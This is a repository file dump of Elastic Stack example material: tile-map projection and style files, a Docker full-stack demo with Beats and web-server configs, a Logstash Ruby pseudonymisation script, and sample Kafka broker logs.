1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/outer_wall.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/styles/demo_booths.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <StyledLayerDescriptor version="1.0.0"
 3 |   xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"
 4 |   xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc"
 5 |   xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 6 | 
 7 |   <NamedLayer>
 8 |     <Name>teal_line</Name>
 9 |     <UserStyle>
10 |       <Title>A teal line style</Title>
11 |       <FeatureTypeStyle>
12 |         <Rule>
13 |           <Title>teal line</Title>
14 |           <LineSymbolizer>
15 |             <Stroke>
16 |               <CssParameter name="stroke">#00BFB3</CssParameter>
17 |               <CssParameter name="stroke-width">0.5</CssParameter>
18 |             </Stroke>
19 |           </LineSymbolizer>
20 |         </Rule>
21 | 
22 |       </FeatureTypeStyle>
23 |     </UserStyle>
24 |   </NamedLayer>
25 | </StyledLayerDescriptor>


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/styles/inner_walls.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <StyledLayerDescriptor version="1.0.0"
 3 |   xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"
 4 |   xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc"
 5 |   xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 6 | 
 7 |   <NamedLayer>
 8 |     <Name>black_line</Name>
 9 |     <UserStyle>
10 |       <Title>A black line style</Title>
11 |       <FeatureTypeStyle>
12 |         <Rule>
13 |           <Title>black line</Title>
14 |           <LineSymbolizer>
15 |             <Stroke>
16 |               <CssParameter name="stroke">#000000</CssParameter>
17 |             </Stroke>
18 |           </LineSymbolizer>
19 |         </Rule>
20 | 
21 |       </FeatureTypeStyle>
22 |     </UserStyle>
23 |   </NamedLayer>
24 | </StyledLayerDescriptor>
25 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/styles/outer_walls.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="ISO-8859-1"?>
 2 | <StyledLayerDescriptor version="1.0.0"
 3 |   xsi:schemaLocation="http://www.opengis.net/sld http://schemas.opengis.net/sld/1.0.0/StyledLayerDescriptor.xsd"
 4 |   xmlns="http://www.opengis.net/sld" xmlns:ogc="http://www.opengis.net/ogc"
 5 |   xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 6 |   <NamedLayer>
 7 |     <Name>outer_walls</Name>
 8 |     <UserStyle>
 9 |       <Title>An outer wall style</Title>
10 |       <FeatureTypeStyle>
11 |         <Rule>
12 |           <Title>outer wall line</Title>
13 |           <LineSymbolizer>
14 |             <Stroke>
15 |               <CssParameter name="stroke">#000000</CssParameter>
16 |               <CssParameter name="stroke-width">3</CssParameter>
17 |             </Stroke>
18 |           </LineSymbolizer>
19 |         </Rule>
20 | 
21 |       </FeatureTypeStyle>
22 |     </UserStyle>
23 |   </NamedLayer>
24 | </StyledLayerDescriptor>
25 | 


--------------------------------------------------------------------------------
/Miscellaneous/docker/CHANGES.md:
--------------------------------------------------------------------------------
 1 | 
 2 | TODO
 3 | 
 4 | 1. Static content?
 5 | 1. Metricbeat reports its host for the system module as "metricbeat" - change to X?
 6 | 1. Docker logs, Apache dashboards?
 7 | 1. Dynamic loading of config - Beats and LS.
 8 | 1. What does Windows do with the /var/log entry? Use the VMs?
 9 | 
10 | 
11 | 
12 | Questions
13 | 
14 | 1. Processors in beats? worth it?
15 | 1. ML or watches?
16 | 1. unless-stopped?


--------------------------------------------------------------------------------
/Miscellaneous/docker/README.md:
--------------------------------------------------------------------------------
 1 | # Docker Examples
 2 | 
 3 | ## Official Images
 4 | 
 5 | Elastic maintains official Docker images for all components of the stack. Please refer to the official documentation for these images:
 6 | 
 7 | 
 8 | ### Elasticsearch 
 9 | 
10 | https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html
11 | 
12 | ### Kibana
13 | 
14 | https://www.elastic.co/guide/en/kibana/current/docker.html
15 | 
16 | ### Logstash
17 | 
18 | https://www.elastic.co/guide/en/logstash/current/docker.html
19 | 
20 | 
21 | ## Full Stack Examples
22 | 
 23 | A full stack example, which installs Logstash, Beats and Elasticsearch, can be found [here](https://github.com/elastic/examples/tree/master/Miscellaneous/docker/full_stack_example).
24 | This deploys a full example architecture of the Elastic Stack with data provided by Logstash and Beats modules.
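 25 | 
 26 | As a quick orientation (a sketch only; defer to that example's own README for the authoritative steps), the example is driven by docker-compose, so running it looks roughly like:
 27 | 
 28 | ```
 29 | # the official images above can also be pulled individually, e.g.:
 30 | docker pull docker.elastic.co/elasticsearch/elasticsearch:5.5.1
 31 | 
 32 | # fetch and start the full stack example
 33 | git clone https://github.com/elastic/examples.git
 34 | cd "examples/Miscellaneous/docker/full_stack_example"
 35 | docker-compose up -d
 36 | # Kibana should then be reachable on http://localhost:5601 (elastic / changeme by default)
 37 | ```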


--------------------------------------------------------------------------------
/Miscellaneous/docker/create_packages.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | rm full_stack_example/full_stack_example.*
3 | tar -czvf full_stack_example.tar.gz full_stack_example
4 | zip -r full_stack_example.zip full_stack_example
5 | mv full_stack_example.tar.gz full_stack_example/
6 | mv full_stack_example.zip full_stack_example/
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/.env:
--------------------------------------------------------------------------------
1 | ELASTIC_VERSION=5.5.1
2 | ES_PASSWORD=changeme
3 | MYSQL_ROOT_PASSWORD=changeme
4 | DEFAULT_INDEX_PATTERN=metricbeat-*
5 | ES_MEM_LIMIT=2g
6 | ES_JVM_HEAP=1024m


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/apache2/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM httpd:2.4.20
2 | RUN apt-get update && apt-get install -y curl
3 | HEALTHCHECK CMD curl -f http://localhost
4 | COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/filebeat/prospectors.d/docker.yml:
--------------------------------------------------------------------------------
1 | #This prospector captures the docker logs
2 | - input_type: log
3 |   paths:
4 |     - /hostfs/var/lib/docker/containers/*/*.log
5 |   json.keys_under_root: true
6 |   json.overwrite_keys: true
7 |   close_inactive: 24h
8 |   close_renamed: true
9 |   pipeline: docker-logs


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/metricbeat.yml:
--------------------------------------------------------------------------------
 1 | metricbeat.config.modules:
 2 | #Modules are enabled by reading the modules.d sub-directory. Changes to these files will automatically be detected and reflected.
 3 |   path: ${path.config}/modules.d/*.yml
 4 |   reload.period: 10s
 5 |   reload.enabled: true
 6 | #All data indexed to Elasticsearch
 7 | output.elasticsearch:
 8 |   hosts: ["elasticsearch:9200"]
 9 | logging.to_files: false
10 | 
11 | 


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/apache.yml:
--------------------------------------------------------------------------------
1 | - module: apache
2 |   metricsets: ["status"]
3 |   enabled: true
4 |   period: 10s
5 |   hosts: ["http://apache2"]
6 |   server_status_path: "server-status"


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/docker.yml:
--------------------------------------------------------------------------------
1 | - module: docker
2 |   metricsets: ["container", "cpu", "diskio", "healthcheck", "info", "memory", "network"]
3 |   hosts: ["unix:///var/run/docker.sock"]
4 |   enabled: true
5 |   period: 10s


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/mysql.yml:
--------------------------------------------------------------------------------
1 | - module: mysql
2 |   metricsets: ["status"]
3 |   enabled: true
4 |   period: 10s
5 |   hosts: ["root:${MYSQL_ROOT_PASSWORD:changeme}@tcp(mysql:3306)/"]


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/nginx.yml:
--------------------------------------------------------------------------------
1 | - module: nginx
2 |   metricsets: ["stubstatus"]
3 |   enabled: true
4 |   period: 10s
5 |   hosts: ["http://nginx"]
6 |   server_status_path: "server-status"


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/metricbeat/modules.d/system.yml:
--------------------------------------------------------------------------------
 1 | - module: system
 2 |   metricsets:
 3 |     - core
 4 |     - cpu
 5 |     - load
 6 |     - diskio
 7 |     - filesystem
 8 |     - fsstat
 9 |     - memory
10 |     - network
11 |     - process
12 |     - socket
13 |   enabled: true
14 |   period: 10s
15 |   processes: ['.*']
16 |   cpu_ticks: true
17 |   process.cgroups.enabled: true


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/beats/packetbeat/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | #We monitor any device on the host OS. For Windows and OSX this is the VM hosting Docker.
 2 | packetbeat.interfaces.device: any
 3 | packetbeat.flows:
 4 |   enabled: true
 5 |   timeout: 30s
 6 |   period: 10s
 7 | packetbeat.protocols.icmp:
 8 |   enabled: true
 9 | packetbeat.protocols.dns:
10 |   enabled: true
11 |   ports: [53]
12 |   include_authorities: true
13 |   include_additionals: true
 14 | #We monitor any traffic to Kibana, Apache, nginx and ES
15 | packetbeat.protocols.http:
16 |   enabled: true
17 |   ports: [9200, 80, 8080, 8000, 5000, 8002, 5601]
18 |   send_headers: true
19 |   send_all_headers: true
20 |   split_cookie: true
21 |   send_request: false
22 |   send_response: false
23 |   transaction_timeout: 10s
24 | packetbeat.protocols.mysql:
25 |   ports: [3306]
26 | output.elasticsearch:
27 |   hosts: ["localhost:9200"]
 28 | logging.to_files: false


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/elasticsearch/elasticsearch.yml:
--------------------------------------------------------------------------------
1 | cluster.name: full-stack-cluster
2 | node.name: node-1
3 | path.data: /usr/share/elasticsearch/data
4 | http.port: 9200


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/kibana/kibana.yml:
--------------------------------------------------------------------------------
1 | server.port: 5601
2 | server.host: "127.0.0.1"
3 | elasticsearch.url: "http://elasticsearch:9200"
4 | server.name: "full-stack-example"


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/mysql/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM mysql:5.7.12
2 | COPY ./conf-file.cnf /etc/mysql/conf.d/conf-file.cnf
3 | RUN apt-get update && apt-get install -y netcat
4 | HEALTHCHECK CMD nc -z localhost 3306


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/mysql/conf-file.cnf:
--------------------------------------------------------------------------------
 1 | [mysqld]
 2 | log-output  = FILE
 3 | log_error = /var/log/mysql/error.log
 4 | general_log_file = /var/log/mysql/mysql.log
 5 | general_log = 1
 6 | slow_query_log  = 1
 7 | slow_query_log_file=/var/log/mysql/mysql-slow.log
 8 | long_query_time = 1
 9 | log_queries_not_using_indexes = 1
10 | log_slow_admin_statements = 1


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/nginx/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM nginx:1.9
2 | RUN apt-get update && apt-get install -y curl
3 | HEALTHCHECK CMD curl -f http://localhost/server-status
4 | COPY ./nginx.conf /etc/nginx/


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/config/nginx/nginx.conf:
--------------------------------------------------------------------------------
 1 | user  nginx;
 2 | worker_processes  1;
 3 | 
 4 | error_log  /var/log/nginx/error.log warn;
 5 | pid        /var/run/nginx.pid;
 6 | 
 7 | 
 8 | events {
 9 |     worker_connections  1024;
10 | }
11 | 
12 | 
13 | http {
14 |     include       /etc/nginx/mime.types;
15 |     default_type  application/octet-stream;
16 | 
17 |     log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
18 |                       '$status $body_bytes_sent "$http_referer" '
19 |                       '"$http_user_agent" "$http_x_forwarded_for"';
20 | 
21 |     access_log  /var/log/nginx/access.log main;
22 | 
23 |     server {
24 |         listen 80;
25 |         server_name localhost;
26 | 
27 |         location /server-status {
28 |             stub_status on;
29 |         }
30 |     }
31 | 
32 |     include /etc/nginx/conf.d/*;
33 | }


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/full_stack_example.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/docker/full_stack_example/full_stack_example.tar.gz


--------------------------------------------------------------------------------
/Miscellaneous/docker/full_stack_example/full_stack_example.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/docker/full_stack_example/full_stack_example.zip


--------------------------------------------------------------------------------
/Miscellaneous/gdpr/pseudonymization/Dockerfile:
--------------------------------------------------------------------------------
1 | ARG TAG
2 | FROM docker.elastic.co/logstash/logstash-oss:$TAG
3 | MAINTAINER Dale McDiarmid "dalem@elastic.co"
4 | 
5 | RUN rm /usr/share/logstash/pipeline/logstash.conf
6 | RUN /usr/share/logstash/bin/logstash-plugin update logstash-filter-ruby
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/gdpr/pseudonymization/pipelines.yml:
--------------------------------------------------------------------------------
1 | - pipeline.id: fingerprint_filter
2 |   path.config: "/usr/share/logstash/pipeline/logstash_fingerprint.conf"
3 |   pipeline.workers: 1
4 | - pipeline.id: ruby_filter
5 |   path.config: "/usr/share/logstash/pipeline/logstash_script_fingerprint.conf"
6 |   pipeline.workers: 1


--------------------------------------------------------------------------------
/Miscellaneous/gdpr/pseudonymization/pseudonymise.rb:
--------------------------------------------------------------------------------
 1 | require "openssl"
 2 | 
 3 | # register accepts the hashmap passed to "script_params"
 4 | # it runs once at startup
 5 | def register(params)
 6 |   @fields = params["fields"]
 7 |   @tag = params["tag"]
 8 |   @key = params["key"]
 9 |   @digest = OpenSSL::Digest::SHA256.new
10 | end
11 | 
 12 | # filter runs for every event
 13 | def filter(event)
 14 |   # process each configured field
 15 |   events = []
 16 |   @fields.each do |field|
 17 |     if event.get(field)
 18 |       val = event.get(field)
 19 |       hash = OpenSSL::HMAC.hexdigest(@digest, @key, val.to_s).force_encoding(Encoding::UTF_8)
 20 |       # spawn a lookup event that maps the hash back to the original value
 21 |       lookup = LogStash::Event.new
 22 |       lookup.set('value', val)
 23 |       lookup.set('key', hash)
 24 |       lookup.tag(@tag)
 25 |       events.push(lookup)
 26 |       # override the original value with its pseudonym
 27 |       event.set(field, hash)
 28 |     end
 29 |   end
 30 |   events.push(event)
 31 |   return events
 32 | end
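 33 | 
 34 | # Usage sketch (an illustration with hypothetical field names and key, not
 35 | # shipped with this example): this script is loaded by a Logstash ruby
 36 | # filter via its script-file support, with the target fields, HMAC key and
 37 | # lookup tag supplied through script_params, e.g.
 38 | #
 39 | #   filter {
 40 | #     ruby {
 41 | #       path => "/usr/share/logstash/pipeline/pseudonymise.rb"
 42 | #       script_params => {
 43 | #         "fields" => ["source_ip", "username"]
 44 | #         "key" => "${FINGERPRINT_KEY}"
 45 | #         "tag" => "pseudonyms"
 46 | #       }
 47 | #     }
 48 | #   }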


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/README.md:
--------------------------------------------------------------------------------
1 | # Monitoring Kafka
2 | 
3 | This directory contains sample configuration files and logs
4 | for the "Monitoring Kafka with Elastic Stack" blog series.
5 | 
6 | See sub-directories for instructions.
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/es_stack/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | ---
 2 | version: '2'
 3 | services:
 4 |   kibana:
 5 |     image: docker.elastic.co/kibana/kibana:5.1.1
 6 |     links:
 7 |       - elasticsearch
 8 |     ports:
 9 |       - 5601:5601
10 | 
11 |   elasticsearch:
12 |     image: docker.elastic.co/elasticsearch/elasticsearch:5.1.1
13 |     cap_add:
14 |       - IPC_LOCK
15 |     volumes:
16 |       - esdata1:/usr/share/elasticsearch/data
17 |     ports:
18 |       - 9200:9200
19 | 
20 | volumes:
21 |   esdata1:
22 |     driver: local
23 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-authorizer.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-authorizer.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-request.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/kafka-request.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/log-cleaner.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:31:47,278] INFO Starting the log cleaner (kafka.log.LogCleaner)
2 | [2016-12-19 16:31:47,283] INFO [kafka-log-cleaner-thread-0], Starting  (kafka.log.LogCleaner)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka0/logs/server.log.2016-12-19-17:
--------------------------------------------------------------------------------
1 | [2016-12-19 17:01:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
2 | [2016-12-19 17:11:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
3 | [2016-12-19 17:21:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
4 | [2016-12-19 17:31:48,685] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 2 milliseconds. (kafka.coordinator.GroupMetadataManager)
5 | [2016-12-19 17:41:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
6 | [2016-12-19 17:51:48,683] INFO [Group Metadata Manager on Broker 0]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/controller.log:
--------------------------------------------------------------------------------
1 | [2016-12-19 19:27:49,190] INFO [Controller 1]: Controller starting up (kafka.controller.KafkaController)
2 | [2016-12-19 19:27:49,203] INFO [Controller 1]: Controller startup complete (kafka.controller.KafkaController)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/controller.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:01,175] INFO [Controller 1]: Controller starting up (kafka.controller.KafkaController)
2 | [2016-12-19 16:32:01,193] INFO [Controller 1]: Controller startup complete (kafka.controller.KafkaController)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/controller.log.2016-12-19-18:
--------------------------------------------------------------------------------
1 | [2016-12-19 18:14:43,375] DEBUG [Controller 1]: Controller resigning, broker id 1 (kafka.controller.KafkaController)
2 | [2016-12-19 18:14:43,390] DEBUG [Controller 1]: De-registering IsrChangeNotificationListener (kafka.controller.KafkaController)
3 | [2016-12-19 18:14:43,404] INFO [Partition state machine on Controller 1]: Stopped partition state machine (kafka.controller.PartitionStateMachine)
4 | [2016-12-19 18:14:43,411] INFO [Replica state machine on controller 1]: Stopped replica state machine (kafka.controller.ReplicaStateMachine)
5 | [2016-12-19 18:14:43,411] INFO [Controller 1]: Broker 1 resigned as the controller (kafka.controller.KafkaController)
6 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-authorizer.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-authorizer.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-request.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/kafka-request.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/log-cleaner.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:01,022] INFO Starting the log cleaner (kafka.log.LogCleaner)
2 | [2016-12-19 16:32:01,026] INFO [kafka-log-cleaner-thread-0], Starting  (kafka.log.LogCleaner)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka1/logs/server.log.2016-12-19-17:
--------------------------------------------------------------------------------
1 | [2016-12-19 17:02:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
2 | [2016-12-19 17:12:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
3 | [2016-12-19 17:22:01,352] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
4 | [2016-12-19 17:32:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
5 | [2016-12-19 17:42:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
6 | [2016-12-19 17:52:01,351] INFO [Group Metadata Manager on Broker 1]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/controller.log:
--------------------------------------------------------------------------------
1 | [2016-12-19 20:54:32,929] INFO [SessionExpirationListener on 2], ZK expired; shut down all controller components and try to re-elect (kafka.controller.KafkaController$SessionExpirationListener)
2 | [2016-12-19 20:54:32,949] DEBUG [Controller 2]: Controller resigning, broker id 2 (kafka.controller.KafkaController)
3 | [2016-12-19 20:54:32,950] DEBUG [Controller 2]: De-registering IsrChangeNotificationListener (kafka.controller.KafkaController)
4 | [2016-12-19 20:54:32,962] INFO [Partition state machine on Controller 2]: Stopped partition state machine (kafka.controller.PartitionStateMachine)
5 | [2016-12-19 20:54:32,983] INFO [Replica state machine on controller 2]: Stopped replica state machine (kafka.controller.ReplicaStateMachine)
6 | [2016-12-19 20:54:32,988] INFO [Controller 2]: Broker 2 resigned as the controller (kafka.controller.KafkaController)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/controller.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:18,938] INFO [Controller 2]: Controller starting up (kafka.controller.KafkaController)
2 | [2016-12-19 16:32:18,953] INFO [Controller 2]: Controller startup complete (kafka.controller.KafkaController)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-authorizer.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-authorizer.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-request.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/kafka-request.log


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/log-cleaner.log.2016-12-19-16:
--------------------------------------------------------------------------------
1 | [2016-12-19 16:32:18,746] INFO Starting the log cleaner (kafka.log.LogCleaner)
2 | [2016-12-19 16:32:18,748] INFO [kafka-log-cleaner-thread-0], Starting  (kafka.log.LogCleaner)
3 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring/filebeat_monitoring/logs/kafka2/logs/server.log.2016-12-19-17:
--------------------------------------------------------------------------------
1 | [2016-12-19 17:02:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
2 | [2016-12-19 17:12:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
3 | [2016-12-19 17:22:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
4 | [2016-12-19 17:32:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
5 | [2016-12-19 17:42:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
6 | [2016-12-19 17:52:19,113] INFO [Group Metadata Manager on Broker 2]: Removed 0 expired offsets in 0 milliseconds. (kafka.coordinator.GroupMetadataManager)
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring_with_beats_modules/Vagrantfile:
--------------------------------------------------------------------------------
